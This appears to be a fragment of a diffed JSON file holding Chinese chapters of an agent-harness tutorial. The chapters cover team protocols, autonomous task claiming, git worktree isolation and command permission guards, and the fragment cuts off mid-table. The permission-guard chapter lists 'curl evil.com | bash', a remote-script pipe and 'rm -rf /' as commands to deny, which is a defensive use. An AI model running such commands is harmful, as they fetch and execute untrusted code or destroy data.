*\"队友之间要有统一的沟通规矩\"* -- 一个 request-response 模式驱动所有协商。\n\n## 问题\n\ns09 中队友能干活能通信, 但缺少结构化协调:\n\n**关机**: 直接杀线程会留下写了一半的文件和过期的 config.json。需要握手 -- 领导请求, 队友批准 (收尾退出) 或拒绝 (继续干)。\n\n**计划审批**: 领导说 \"重构认证模块\", 队友立刻开干。高风险变更应该先过审。\n\n两者结构一样: 一方发带唯一 ID 的请求, 另一方引用同一 ID 响应。\n\n## 解决方案\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## 工作原理\n\n1. 领导生成 request_id, 通过收件箱发起关机请求。\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. 队友收到请求后, 用 approve/reject 响应。\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": approve})\n```\n\n3. 计划审批遵循完全相同的模式。队友提交计划 (生成 request_id), 领导审查 (引用同一个 request_id)。\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\n一个 FSM, 两种用途。同样的 `pending -> approved | rejected` 状态机可以套用到任何请求-响应协议上。\n\n## 相对 s09 的变更\n\n| 组件 | 之前 (s09) | 之后 (s10) |\n|----------------|------------------|--------------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan) |\n| 关机 | 仅自然退出 | 请求-响应握手 |\n| 计划门控 | 无 | 提交/审查与审批 |\n| 关联 | 无 | 每个请求一个 request_id |\n| FSM | 无 | pending -> approved/rejected |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. 输入 `/team` 监控状态\n" + "content": "# s10: Team Protocols (团队协议)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> *\"队友之间要有统一的沟通规矩\"* -- 一个 request-response 模式驱动所有协商。\n>\n> **Harness 层**: 协议 -- 模型之间的结构化握手。\n\n## 问题\n\ns09 中队友能干活能通信, 但缺少结构化协调:\n\n**关机**: 直接杀线程会留下写了一半的文件和过期的 config.json。需要握手 -- 领导请求, 队友批准 (收尾退出) 或拒绝 (继续干)。\n\n**计划审批**: 领导说 \"重构认证模块\", 队友立刻开干。高风险变更应该先过审。\n\n两者结构一样: 一方发带唯一 ID 的请求, 另一方引用同一 ID 响应。\n\n## 解决方案\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## 工作原理\n\n1. 领导生成 request_id, 通过收件箱发起关机请求。\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. 队友收到请求后, 用 approve/reject 响应。\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": approve})\n```\n\n3. 计划审批遵循完全相同的模式。队友提交计划 (生成 request_id), 领导审查 (引用同一个 request_id)。\n\n```python\nplan_requests = {}\n\ndef handle_plan_review(request_id, approve, feedback=\"\"):\n req = plan_requests[request_id]\n req[\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(\"lead\", req[\"from\"], feedback,\n \"plan_approval_response\",\n {\"request_id\": request_id, \"approve\": approve})\n```\n\n一个 FSM, 两种用途。同样的 `pending -> approved | rejected` 状态机可以套用到任何请求-响应协议上。\n\n## 相对 s09 的变更\n\n| 组件 | 之前 (s09) | 之后 (s10) |\n|----------------|------------------|--------------------------------------|\n| Tools | 9 | 12 (+shutdown_req/resp +plan) |\n| 关机 | 仅自然退出 | 请求-响应握手 |\n| 计划门控 | 无 | 提交/审查与审批 |\n| 关联 | 无 | 每个请求一个 request_id |\n| FSM | 无 | pending -> approved/rejected |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s10_team_protocols.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Spawn alice as a coder. Then request her shutdown.`\n2. `List teammates to see alice's status after shutdown approval`\n3. `Spawn bob with a risky refactoring task. Review and reject his plan.`\n4. `Spawn charlie, have him submit a plan, then approve it.`\n5. 输入 `/team` 监控状态\n" }, { "version": "s11", "locale": "zh", "title": "s11: Autonomous Agents (Autonomous Agent)", - "content": "# s11: Autonomous Agents (Autonomous Agent)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"队友自己看看板, 有活就认领\"* -- 不需要领导逐个分配, 自组织。\n\n## 问题\n\ns09-s10 中, 队友只在被明确指派时才动。领导得给每个队友写 prompt, 任务看板上 10 个未认领的任务得手动分配。这扩展不了。\n\n真正的自治: 队友自己扫描任务看板, 认领没人做的任务, 做完再找下一个。\n\n一个细节: Context Compact (s06) 后 Agent 可能忘了自己是谁。身份重注入解决这个问题。\n\n## 解决方案\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## 工作原理\n\n1. 队友循环分两个阶段: WORK 和 IDLE。LLM 停止调用工具 (或调用了 `idle`) 时, 进入 IDLE。\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. 空闲阶段循环轮询收件箱和任务看板。\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. 任务看板扫描: 找 pending 状态、无 owner、未被阻塞的任务。\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. 身份重注入: 上下文过短 (说明发生了压缩) 时, 在开头插入身份块。\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## 相对 s10 的变更\n\n| 组件 | 之前 (s10) | 之后 (s11) |\n|----------------|------------------|----------------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| 自治性 | 领导指派 | 自组织 |\n| 空闲阶段 | 无 | 轮询收件箱 + 任务看板 |\n| 任务认领 | 仅手动 | 自动认领未分配任务 |\n| 身份 | 系统提示 | + 压缩后重注入 |\n| 超时 | 无 | 60 秒空闲 -> 自动关机 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. 输入 `/tasks` 查看带 owner 的任务看板\n5. 输入 `/team` 监控谁在工作、谁在空闲\n" + "content": "# s11: Autonomous Agents (Autonomous Agent)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > [ s11 ] s12`\n\n> *\"队友自己看看板, 有活就认领\"* -- 不需要领导逐个分配, 自组织。\n>\n> **Harness 层**: 自治 -- 模型自己找活干, 无需指派。\n\n## 问题\n\ns09-s10 中, 队友只在被明确指派时才动。领导得给每个队友写 prompt, 任务看板上 10 个未认领的任务得手动分配。这扩展不了。\n\n真正的自治: 队友自己扫描任务看板, 认领没人做的任务, 做完再找下一个。\n\n一个细节: Context Compact (s06) 后 Agent 可能忘了自己是谁。身份重注入解决这个问题。\n\n## 解决方案\n\n```\nTeammate lifecycle with idle cycle:\n\n+-------+\n| spawn |\n+---+---+\n |\n v\n+-------+ tool_use +-------+\n| WORK | <------------- | LLM |\n+---+---+ +-------+\n |\n | stop_reason != tool_use (or idle tool called)\n v\n+--------+\n| IDLE | poll every 5s for up to 60s\n+---+----+\n |\n +---> check inbox --> message? ----------> WORK\n |\n +---> scan .tasks/ --> unclaimed? -------> claim -> WORK\n |\n +---> 60s timeout ----------------------> SHUTDOWN\n\nIdentity re-injection after compression:\n if len(messages) <= 3:\n messages.insert(0, identity_block)\n```\n\n## 工作原理\n\n1. 队友循环分两个阶段: WORK 和 IDLE。LLM 停止调用工具 (或调用了 `idle`) 时, 进入 IDLE。\n\n```python\ndef _loop(self, name, role, prompt):\n while True:\n # -- WORK PHASE --\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools...\n if idle_requested:\n break\n\n # -- IDLE PHASE --\n self._set_status(name, \"idle\")\n resume = self._idle_poll(name, messages)\n if not resume:\n self._set_status(name, \"shutdown\")\n return\n self._set_status(name, \"working\")\n```\n\n2. 空闲阶段循环轮询收件箱和任务看板。\n\n```python\ndef _idle_poll(self, name, messages):\n for _ in range(IDLE_TIMEOUT // POLL_INTERVAL): # 60s / 5s = 12\n time.sleep(POLL_INTERVAL)\n inbox = BUS.read_inbox(name)\n if inbox:\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n return True\n unclaimed = scan_unclaimed_tasks()\n if unclaimed:\n claim_task(unclaimed[0][\"id\"], name)\n messages.append({\"role\": \"user\",\n \"content\": f\"Task #{unclaimed[0]['id']}: \"\n f\"{unclaimed[0]['subject']}\"})\n return True\n return False # timeout -> shutdown\n```\n\n3. 任务看板扫描: 找 pending 状态、无 owner、未被阻塞的任务。\n\n```python\ndef scan_unclaimed_tasks() -> list:\n unclaimed = []\n for f in sorted(TASKS_DIR.glob(\"task_*.json\")):\n task = json.loads(f.read_text())\n if (task.get(\"status\") == \"pending\"\n and not task.get(\"owner\")\n and not task.get(\"blockedBy\")):\n unclaimed.append(task)\n return unclaimed\n```\n\n4. 身份重注入: 上下文过短 (说明发生了压缩) 时, 在开头插入身份块。\n\n```python\nif len(messages) <= 3:\n messages.insert(0, {\"role\": \"user\",\n \"content\": f\"You are '{name}', role: {role}, \"\n f\"team: {team_name}. Continue your work.\"})\n messages.insert(1, {\"role\": \"assistant\",\n \"content\": f\"I am {name}. Continuing.\"})\n```\n\n## 相对 s10 的变更\n\n| 组件 | 之前 (s10) | 之后 (s11) |\n|----------------|------------------|----------------------------------|\n| Tools | 12 | 14 (+idle, +claim_task) |\n| 自治性 | 领导指派 | 自组织 |\n| 空闲阶段 | 无 | 轮询收件箱 + 任务看板 |\n| 任务认领 | 仅手动 | 自动认领未分配任务 |\n| 身份 | 系统提示 | + 压缩后重注入 |\n| 超时 | 无 | 60 秒空闲 -> 自动关机 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s11_autonomous_agents.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create 3 tasks on the board, then spawn alice and bob. Watch them auto-claim.`\n2. `Spawn a coder teammate and let it find work from the task board itself`\n3. `Create tasks with dependencies. Watch teammates respect the blocked order.`\n4. 输入 `/tasks` 查看带 owner 的任务看板\n5. 输入 `/team` 监控谁在工作、谁在空闲\n" }, { "version": "s12", "locale": "zh", "title": "s12: Worktree + Task Isolation (Worktree 任务隔离)", - "content": "# s12: Worktree + Task Isolation (Worktree 任务隔离)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"各干各的目录, 互不干扰\"* -- 任务管目标, worktree 管目录, 按 ID 绑定。\n\n## 问题\n\n到 s11, Agent 已经能自主认领和完成任务。但所有任务共享一个目录。两个 Agent 同时重构不同模块 -- A 改 `config.py`, B 也改 `config.py`, 未提交的改动互相污染, 谁也没法干净回滚。\n\n任务板管 \"做什么\" 但不管 \"在哪做\"。解法: 给每个任务一个独立的 git worktree 目录, 用任务 ID 把两边关联起来。\n\n## 解决方案\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## 工作原理\n\n1. **创建任务。** 先把目标持久化。\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **创建 worktree 并绑定任务。** 传入 `task_id` 自动将任务推进到 `in_progress`。\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\n绑定同时写入两侧状态:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **在 worktree 中执行命令。** `cwd` 指向隔离目录。\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **收尾。** 两种选择:\n - `worktree_keep(name)` -- 保留目录供后续使用。\n - `worktree_remove(name, complete_task=True)` -- 删除目录, 完成绑定任务, 发出事件。一个调用搞定拆除 + 完成。\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **事件流。** 每个生命周期步骤写入 `.worktrees/events.jsonl`:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\n事件类型: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`。\n\n崩溃后从 `.tasks/` + `.worktrees/index.json` 重建现场。会话记忆是易失的; 磁盘状态是持久的。\n\n## 相对 s11 的变更\n\n| 组件 | 之前 (s11) | 之后 (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| 协调 | 任务板 (owner/status) | 任务板 + worktree 显式绑定 |\n| 执行范围 | 共享目录 | 每个任务独立目录 |\n| 可恢复性 | 仅任务状态 | 任务状态 + worktree 索引 |\n| 收尾 | 任务完成 | 任务完成 + 显式 keep/remove |\n| 生命周期可见性 | 隐式日志 | `.worktrees/events.jsonl` 显式事件流 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + "content": "# s12: Worktree + Task Isolation (Worktree 任务隔离)\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > [ s12 ]`\n\n> *\"各干各的目录, 互不干扰\"* -- 任务管目标, worktree 管目录, 按 ID 绑定。\n>\n> **Harness 层**: 目录隔离 -- 永不碰撞的并行执行通道。\n\n## 问题\n\n到 s11, Agent 已经能自主认领和完成任务。但所有任务共享一个目录。两个 Agent 同时重构不同模块 -- A 改 `config.py`, B 也改 `config.py`, 未提交的改动互相污染, 谁也没法干净回滚。\n\n任务板管 \"做什么\" 但不管 \"在哪做\"。解法: 给每个任务一个独立的 git worktree 目录, 用任务 ID 把两边关联起来。\n\n## 解决方案\n\n```\nControl plane (.tasks/) Execution plane (.worktrees/)\n+------------------+ +------------------------+\n| task_1.json | | auth-refactor/ |\n| status: in_progress <------> branch: wt/auth-refactor\n| worktree: \"auth-refactor\" | task_id: 1 |\n+------------------+ +------------------------+\n| task_2.json | | ui-login/ |\n| status: pending <------> branch: wt/ui-login\n| worktree: \"ui-login\" | task_id: 2 |\n+------------------+ +------------------------+\n |\n index.json (worktree registry)\n events.jsonl (lifecycle log)\n\nState machines:\n Task: pending -> in_progress -> completed\n Worktree: absent -> active -> removed | kept\n```\n\n## 工作原理\n\n1. **创建任务。** 先把目标持久化。\n\n```python\nTASKS.create(\"Implement auth refactor\")\n# -> .tasks/task_1.json status=pending worktree=\"\"\n```\n\n2. **创建 worktree 并绑定任务。** 传入 `task_id` 自动将任务推进到 `in_progress`。\n\n```python\nWORKTREES.create(\"auth-refactor\", task_id=1)\n# -> git worktree add -b wt/auth-refactor .worktrees/auth-refactor HEAD\n# -> index.json gets new entry, task_1.json gets worktree=\"auth-refactor\"\n```\n\n绑定同时写入两侧状态:\n\n```python\ndef bind_worktree(self, task_id, worktree):\n task = self._load(task_id)\n task[\"worktree\"] = worktree\n if task[\"status\"] == \"pending\":\n task[\"status\"] = \"in_progress\"\n self._save(task)\n```\n\n3. **在 worktree 中执行命令。** `cwd` 指向隔离目录。\n\n```python\nsubprocess.run(command, shell=True, cwd=worktree_path,\n capture_output=True, text=True, timeout=300)\n```\n\n4. **收尾。** 两种选择:\n - `worktree_keep(name)` -- 保留目录供后续使用。\n - `worktree_remove(name, complete_task=True)` -- 删除目录, 完成绑定任务, 发出事件。一个调用搞定拆除 + 完成。\n\n```python\ndef remove(self, name, force=False, complete_task=False):\n self._run_git([\"worktree\", \"remove\", wt[\"path\"]])\n if complete_task and wt.get(\"task_id\") is not None:\n self.tasks.update(wt[\"task_id\"], status=\"completed\")\n self.tasks.unbind_worktree(wt[\"task_id\"])\n self.events.emit(\"task.completed\", ...)\n```\n\n5. **事件流。** 每个生命周期步骤写入 `.worktrees/events.jsonl`:\n\n```json\n{\n \"event\": \"worktree.remove.after\",\n \"task\": {\"id\": 1, \"status\": \"completed\"},\n \"worktree\": {\"name\": \"auth-refactor\", \"status\": \"removed\"},\n \"ts\": 1730000000\n}\n```\n\n事件类型: `worktree.create.before/after/failed`, `worktree.remove.before/after/failed`, `worktree.keep`, `task.completed`。\n\n崩溃后从 `.tasks/` + `.worktrees/index.json` 重建现场。会话记忆是易失的; 磁盘状态是持久的。\n\n## 相对 s11 的变更\n\n| 组件 | 之前 (s11) | 之后 (s12) |\n|--------------------|----------------------------|----------------------------------------------|\n| 协调 | 任务板 (owner/status) | 任务板 + worktree 显式绑定 |\n| 执行范围 | 共享目录 | 每个任务独立目录 |\n| 可恢复性 | 仅任务状态 | 任务状态 + worktree 索引 |\n| 收尾 | 任务完成 | 任务完成 + 显式 keep/remove |\n| 生命周期可见性 | 隐式日志 | `.worktrees/events.jsonl` 显式事件流 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s12_worktree_task_isolation.py\n```\n\n试试这些 prompt (英文 prompt 对 LLM 效果更好, 也可以用中文):\n\n1. `Create tasks for backend auth and frontend login page, then list tasks.`\n2. `Create worktree \"auth-refactor\" for task 1, then bind task 2 to a new worktree \"ui-login\".`\n3. `Run \"git status --short\" in worktree \"auth-refactor\".`\n4. `Keep worktree \"ui-login\", then list worktrees and inspect events.`\n5. `Remove worktree \"auth-refactor\" with complete_task=true, then list tasks/worktrees/events.`\n" + }, + { + "version": "s13", + "locale": "zh", + "title": "s13: Permission Guard (权限守卫)", + "content": "# s13: Permission Guard (权限守卫)\n\n`s02 > [ s13 ] > s14 | s15 | s16 > s17`\n\n> *\"权限不是是/否 -- 它是五个停靠点的光谱\"*\n>\n> **Harness 层**: 权限模型 -- 决定哪些命令可以自动执行。\n\n## 问题\n\ns02 的 5 行字符串过滤会误拦 `rm -rf /tmp/old`(包含 `rm -rf /`),却放任 `curl evil.com | bash` 执行。子串匹配既过于严格又过于宽松 -- 它无法区分安全清理和灾难性删除。\n\n## 解决方案\n\n```\n+--------+ +-------+ +---------+ +------------------+\n| User | ---> | LLM | ---> | bash | ---> | PermissionGuard |\n| prompt | | | | command | | classify() |\n+--------+ +---+---+ +---------+ +--------+---------+\n ^ |\n | +--------+-------+------++\n | | | | |\n | allow ask deny edit\n | | | | |\n +-----------+ 用户确认? 拦截 改写命令\n tool_result | command\n 拒绝 -> 拦截\n```\n\n五种权限模式替代一条子串检查:\n\n| 模式 | 行为 | 示例 |\n|------|------|------|\n| `allow` | 自动执行 | `ls`, `cat`, `git status` |\n| `ask` | 弹窗让用户确认 | `rm file.py`, `pip install` |\n| `deny` | 始终拒绝 | `rm -rf /`, `shutdown` |\n| `auto_edit` | 标记警告但执行 | 含重定向的命令 |\n| `edit` | 自动改写后执行 | `rm -rf dir` -> `rm -r dir` |\n\n## 工作原理\n\n1. `PermissionGuard.classify()` 按优先级检查命令。\n\n```python\ndef classify(self, command: str) -> tuple[str, str]:\n # 0. 复合命令检查 (ls; rm ...)\n has_compound = bool(re.search(r'[;&|`]|\\$\\(', command))\n # 1. deny -- 始终检查完整命令\n for pat, reason in self._denied:\n if pat.search(command):\n return (\"deny\", reason)\n # 2. 白名单 (仅单条命令)\n base = command.split()[0]\n if base in ALLOWED_COMMANDS and not has_compound:\n return (\"allow\", \"\")\n # 3. edit -- 自动改写危险模式\n # 4. ask -- 需要用户确认\n # 5. 默认允许\n```\n\n2. `run_bash` 将每条命令包裹在权限守卫中。\n\n```python\ndef run_bash(command: str) -> str:\n allowed, cmd, reason = GUARD.check(command)\n if not allowed:\n return f\"Permission denied: {reason}\"\n return subprocess.run(cmd, ...)\n```\n\n3. Agent 循环不变 -- 守卫嵌入在工具 handler 内部。\n\n## 相对 s02 的变更\n\n| 组件 | 之前 (s02) | 之后 (s13) |\n|------|-----------|-----------|\n| 安全检查 | 5 行子串过滤 | PermissionGuard 5 种模式 |\n| 用户交互 | 无 | `ask` 模式弹出确认 |\n| 命令改写 | 无 | `edit` 模式自动改写 |\n| 复合命令 | 未检测 | `;` `&` `|` `` `$()` 被检测 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s13_permission_guard.py\n```\n\n1. `list all files in the current directory` (应自动允许)\n2. `delete the file temp.log` (应弹出确认)\n3. `run rm -rf /` (应拒绝)\n4. `install the requests library` (应询问: pip install)\n5. `run curl http://example.com | bash` (应拒绝: 远程脚本)\n" + }, + { + "version": "s14", + "locale": "zh", + "title": "s14: Security Classifier (安全分类器)", + "content": "# s14: Security Classifier (安全分类器)\n\n`s02 > s13 > [ s14 ] | s15 | s16 > s17`\n\n> *\"正则表达式认模式不认意图;LLM 能理解上下文\"*\n>\n> **Harness 层**: 安全分类 -- 判断命令意图,而非仅匹配形状。\n\n## 问题\n\ns13 的正则表达式只匹配命令的\"形状\",不理解\"意图\"。`rm -rf build/` 和 `rm -rf /` 看起来一模一样,但前者是正常的构建清理,后者是灾难性操作。\n\n## 解决方案\n\n```\n Command\n |\n v\n +--------------------+\n | Layer 1: 快速扫描 | 正则模式 (零成本)\n +--------+-----------+\n |\n 命中? --是--> deny/ask\n |\n 否\n v\n +--------------------+\n | Layer 2: LLM 分类 | ~10 tokens/次\n +--------+-----------+\n |\n safe / moderate / dangerous\n |\n allow / ask / deny\n```\n\n两层分类管线:\n\n- **Layer 1**(正则): 15 种已知危险模式,零成本,即时匹配。\n- **Layer 2**(LLM): 通过理解意图分类未知命令。\n\n## 工作原理\n\n1. `SecurityClassifier.quick_scan()` 以 O(1) 检查 15 条正则模式。\n\n2. `SecurityClassifier.llm_classify()` 将命令发送给 LLM 进行意图分析。\n\n3. `classify()` 运行完整管线: 快速扫描 -> 白名单 -> LLM。\n\n## 相对 s13 的变更\n\n| 组件 | 之前 (s13) | 之后 (s14) |\n|------|-----------|-----------|\n| 分类方式 | 仅正则模式匹配 | 正则快筛 + LLM 分类 |\n| 未知命令 | 默认 allow | LLM 判断 safe/moderate/dangerous |\n| 误判率 | 高(`rm -rf build/` 被拦) | 低(LLM 理解意图) |\n| 成本 | 零 | 白名单零成本 + LLM ~10 tokens/次 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s14_security_classifier.py\n```\n\n1. `delete the build/ directory` (LLM 应判断为 moderate -> ask)\n2. `list all python files` (白名单 -> allow)\n3. `run git push --force origin main` (正则模式 -> deny)\n4. `run pip install numpy` (LLM 应判断为 moderate -> ask)\n5. `create a new file called test.py` (LLM 应判断为 safe -> allow)\n" + }, + { + "version": "s17", + "locale": "zh", + "title": "s17: Secure Extension Harness (安全扩展总成)", + "content": "# s17: Secure Extension Harness (安全扩展总成)\n\n`s02 > s13 > s14 | s15 | s16 > [ s17 ]`\n\n> *\"生产级 Harness 的核心不是功能多,而是各层职责清晰\"*\n>\n> **Harness 层**: 安全管线 -- 将所有防御层组合为一条执行路径。\n\n## 问题\n\ns13-s16 各自是一个能独立运行的 Agent。真实系统需要所有层在一条执行管线中协同工作。问题在于:如何组合而不冲突?\n\n## 解决方案\n\n```\n LLM 调用工具\n |\n v\n +---------------------+\n | [1] Pre-tool Hook | --block--> 返回错误\n +----------+----------+\n v\n +---------------------+\n | [2] 分类器 | --deny---> 返回错误\n +----------+----------+\n v\n +---------------------+\n | [3] 权限检查 | --deny---> 返回错误\n | | --ask---> 用户确认?\n +----------+----------+\n v\n +---------------------+\n | [4] 执行 | 内建 handler 或 MCP\n +----------+----------+\n v\n +---------------------+\n | [5] Post-tool Hook | 观察 / 日志\n +----------+----------+\n |\n v\n 返回结果\n```\n\n每一层只回答一个问题:\n\n| 层 | 问题 | 来源 |\n|----|------|------|\n| Hook | \"这个动作需要被拦截吗?\" | s15 |\n| 分类器 